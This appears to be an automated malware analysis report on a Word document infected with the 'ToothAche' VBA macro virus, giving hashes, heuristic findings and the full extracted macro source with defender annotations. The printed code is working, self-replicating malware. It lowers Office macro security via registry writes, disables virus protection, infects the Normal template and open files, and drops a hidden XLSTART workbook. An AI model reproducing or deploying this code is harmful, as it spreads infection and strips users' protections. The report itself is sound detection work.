Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d40f0b717d93fa3b…

MALICIOUS

Office (OLE)

67.0 KB Created: 2001-05-26 08:22:00 Authoring application: Microsoft Word 10.0 First seen: 2015-10-13
MD5: 7d25f383958f4caf6ac582249a9b0230 SHA-1: bcc59ed4de9a12a20f2adfe8f755861bcf37cc50 SHA-256: d40f0b717d93fa3bcd6743b48b8c61a4de71d731f6bac53965bdd836a331cd17
260 Risk Score

Heuristics 6

  • ClamAV: Doc.Trojan.Toot-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Toot-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    .deletelines _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("Word.Application")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject(, _
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behavior.
    Matched line in script
    Dir(Application.StartupPath _

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12737 bytes
SHA-256: 012f442fd72a9481396759222b5809311713764c40a4eb42285040c08e9d4481
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: exported module header (olevba output). The module is named ThisDocument,
' its VB_Base is "1Normal.ThisDocument" and VB_TemplateDerived is True, which is consistent
' with a document module inherited from the Normal template — i.e. the same module text the
' code below copies into NormalTemplate.
'ToothAche by Kernel32
' --- Analyst annotation (defender notes; the code itself is unmodified) ---
' Excel-side stage of the "ToothAche" macro virus. Workbook_Deactivate is an Excel
' workbook event, so this handler fires when an infected workbook loses focus; the same
' module text also carries document_Close for the Word host. Visible behaviour, in order:
'   1. copies this module's own source into `Code` (the payload written everywhere below);
'   2. attaches to, or starts, Word (GetObject/CreateObject), lowers Word's macro security
'      via registry writes and Options.VirusProtection, then overwrites the ThisDocument
'      module of the Normal template and of every open Word document with `Code`;
'   3. drops a hidden <Application.StartupPath>\Toothache.xls (XLSTART persistence) and
'      overwrites the ThisWorkBook module of every open workbook with `Code`.
' Everything runs under On Error Resume Next, so a failing step is skipped silently.
' The `_` after almost every token is VBA line continuation: each statement is spread over
' many physical lines (presumably to hinder line-based signature matching).
' Detection: watch for writes to the HKCU Office Security/Options keys decoded below, for
' Toothache.xls appearing in XLSTART, and for VBProject.VBComponents(...).CodeModule access
' (DeleteLines/AddFromString) from a document macro.
Private _
Sub _
Workbook_Deactivate()
On _
Error _
Resume _
Next
' From here on every runtime error is swallowed; a step that fails (no Word installed,
' VBA project access denied) is skipped rather than reported.
With _
ThisWorkbook
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
With _
.CodeModule
Code _
= _
.Lines(1, _
.countoflines)
' `Code` now holds this module's complete source text — the replication payload.
End _
With
End _
With
End _
With
End _
With
Set _
wrd _
= _
GetObject(, _
"Word.Application")
' wason = 1 means a Word instance was already running; it is used at the end to decide
' whether to Quit Word.
wason _
= _
1
If _
wrd _
= _
"" _
Then
Set _
wrd _
= _
CreateObject("Word.Application")
wason _
= _
0
End _
If
With _
wrd
With _
.System
' Word's System.PrivateProfileString with an empty file name reads/writes the registry.
' The Chr() chains below decode to the following keys (defender note: writes to these
' are a strong detection signal):
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel, value Options6 := 0
'     (Excel 97 settings; presumably the macro-virus-warning toggle — confirm against Excel 97 docs)
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security, value Level := 1
'     (Word 2000 macro security set to Low)
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security, value Level := 1
'     (Word 2002 macro security set to Low)
If _
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) <> 1& Then
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security, value AccessVBOM:
'     set to 1 below unless it already is (1 = "trust access to the VBA project", which
'     the CodeModule writes further down depend on).
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) = 1&
End _
If
End _
With
With _
.Options
.VirusProtection _
= _
0
' Turns off Word's built-in macro-virus warning (the OLE_VBA_MACRO_VIRUS_REPLICATION
' finding keys on this assignment).
.SaveNormalPrompt _
= _
0
' Suppresses the "save changes to Normal template?" prompt, so the template infection
' below is written without the user noticing.
End _
With
With _
.Application
.DisplayAlerts _
= _
wdAlertsNone
' NOTE(review): wdAlertsNone is a Word constant; in an Excel host the name is undeclared
' and presumably evaluates to Empty (0), which happens to equal wdAlertsNone — not verified.
End _
With
End _
With
With _
wrd
With _
.NormalTemplate
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
' Global-template infection: empties the ThisDocument module of the Normal template and
' replaces it with this module's source.
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
End _
With
For _
Each _
fly _
In _
wrd.Documents
' Same overwrite for every document currently open in that Word instance.
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
If _
wason _
= _
0 _
Then _
wrd.Quit
' Word is closed again only if this macro started it, so an already-running Word stays up.
If _
Dir(Application.StartupPath _
& _
"\Toothache.xls") _
= _
"Toothache.xls" _
Then _
inst _
= _
1
' inst = 1 when the XLSTART dropper already exists; otherwise it is created below.
If _
inst _
<> _
1 _
Then
With _
Workbooks
.Add.SaveAs _
FileName:=Application.StartupPath _
& _
"\Toothache.xls"
' Persistence: a new workbook saved into Excel's startup folder is opened on every
' Excel start (OLE_VBA_XLSTART_PERSISTENCE).
End _
With
With _
ActiveWorkbook
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
' NOTE(review): unlike every other copy in this module there is no `With .CodeModule`
' level here, so .deletelines/.addfromstring are invoked on the VBComponent itself;
' under On Error Resume Next a failure here is silent — whether the dropper actually
' receives the code is not verified from this listing.
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
With _
ActiveWindow
.Visible _
= _
0
' Hides the freshly created workbook's window from the user.
End _
With
Workbooks("Toothache.xls").Save
ActiveWorkbook.Save
End _
If
For _
Each _
fly _
In _
Workbooks
' Overwrites the ThisWorkBook module of every open workbook with this module's source.
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
End _
Sub
' --- Analyst annotation (defender notes; the code itself is unmodified) ---
' Word-side stage of the "ToothAche" macro virus, run from the Document_Close event of an
' infected document. Mirror image of Workbook_Deactivate in the same module:
'   1. copies this module's own source into `Code`;
'   2. attaches to, or starts, Excel (GetObject/CreateObject), drops a hidden
'      <StartupPath>\Toothache.xls (XLSTART persistence) and overwrites the ThisWorkBook
'      module of every open workbook with `Code`, then quits Excel if it started it;
'   3. lowers Word's own macro security (registry writes decoded below, Options.VirusProtection)
'      and overwrites the ThisDocument module of every open document and of NormalTemplate.
' Everything runs under On Error Resume Next, so a failing step is skipped silently.
' The `_` after almost every token is VBA line continuation: each statement is spread over
' many physical lines (presumably to hinder line-based signature matching).
' Detection: writes to the HKCU Office Security/Options keys below, Toothache.xls in
' XLSTART, and CodeModule DeleteLines/AddFromString from a document macro.
Private _
Sub _
document_Close()
On _
Error _
Resume _
Next
' From here on every runtime error is swallowed (no Excel installed, VBA project access
' denied, ...); the step is skipped rather than reported.
With _
ThisDocument
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
Code _
= _
.Lines(1, _
.countoflines)
' `Code` now holds this module's complete source text — the replication payload.
End _
With
End _
With
End _
With
End _
With
Set _
EXL _
= _
GetObject(, _
"Excel.Application")
' wason = 1 means an Excel instance was already running; checked later to decide whether
' to Quit Excel.
wason _
= _
1
If _
EXL _
= _
"" _
Then
Set _
EXL _
= _
CreateObject("Excel.Application")
wason _
= _
0
End _
If
With _
EXL
With _
.Application
.DisplayAlerts _
= _
wdAlertsNone
' Excel's DisplayAlerts is set with the Word constant wdAlertsNone (0), i.e. False:
' no save/overwrite prompts while the dropper is written.
End _
With
End _
With
If _
Dir(EXL.Application.StartupPath _
& _
"\Toothache.xls") _
= _
"Toothache.xls" _
Then _
inst _
= _
1
' inst = 1 when the XLSTART dropper already exists; otherwise it is created below.
If _
inst _
<> _
1 _
Then
With _
EXL.Workbooks
.Add.SaveAs _
FileName:=EXL.Application.StartupPath _
& _
"\Toothache.xls"
' Persistence: a workbook saved into Excel's startup folder is opened on every Excel
' start (OLE_VBA_XLSTART_PERSISTENCE).
End _
With
With _
ActiveWorkbook
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
' NOTE(review): no `With .CodeModule` level here (unlike the loops below), so
' .deletelines/.addfromstring are invoked on the VBComponent itself; any error is
' swallowed by On Error Resume Next. Also, `ActiveWorkbook` is unqualified while the
' surrounding calls go through `EXL.` — whether it resolves in the Word host is not
' verified from this listing.
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
With _
EXL.ActiveWindow
.Visible _
= _
0
' Hides the freshly created workbook's window from the user.
End _
With
EXL.Workbooks("Toothache.xls").Save
EXL.ActiveWorkbook.Save
End _
If
For _
Each _
fly _
In _
EXL.Workbooks
' Overwrites the ThisWorkBook module of every workbook open in that Excel instance.
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisWorkBook")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
If _
wason _
= _
0 _
Then _
EXL.Quit
' Excel is closed again only if this macro started it.
With _
System
' Word's own System.PrivateProfileString with an empty file name reads/writes the
' registry. The Chr() chains below decode to the following keys (defender note: writes
' to these are a strong detection signal):
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel, value Options6 := 0
'     (Excel 97 settings; presumably the macro-virus-warning toggle — confirm against Excel 97 docs)
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security, value Level := 1
'     (Word 2000 macro security set to Low)
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security, value Level := 1
'     (Word 2002 macro security set to Low)
If _
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) <> 1& Then
'   ^ HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security, value AccessVBOM:
'     set to 1 below unless it already is (1 = "trust access to the VBA project", which
'     the CodeModule writes further down depend on).
.PrivateProfileString("", _
Chr(72) _
& _
Chr(75) _
& _
Chr(69) _
& _
Chr(89) _
& _
Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(86) & Chr(66) & Chr(79) & Chr(77)) = 1&
End _
If
End _
With
With _
Options
.VirusProtection _
= _
0
' Turns off Word's built-in macro-virus warning (the OLE_VBA_MACRO_VIRUS_REPLICATION
' finding keys on this assignment).
With _
.Application
.DisplayAlerts _
= _
wdAlertsNone
' Silences Word's own alerts so the template/document rewrites below show no prompts.
End _
With
End _
With
For _
Each _
fly _
In _
Documents
' Overwrites the ThisDocument module of every open document with this module's source.
With _
fly
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
Next
With _
NormalTemplate
' Global-template infection: empties the Normal template's ThisDocument module and
' replaces it with this module's source, so every new document inherits the code.
With _
.VBProject
With _
.vbcomponents("ThisDocument")
With _
.CodeModule
.deletelines _
1, _
.countoflines
.addfromstring _
Code
End _
With
End _
With
End _
With
End _
With
End _
Sub



















Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: header of a second exported module, ThisDocument1, whose VB_Base is a
' class GUID rather than Normal.ThisDocument (VB_TemplateDerived = False). No procedure
' code follows it in the extracted preview, so nothing further can be said about it here.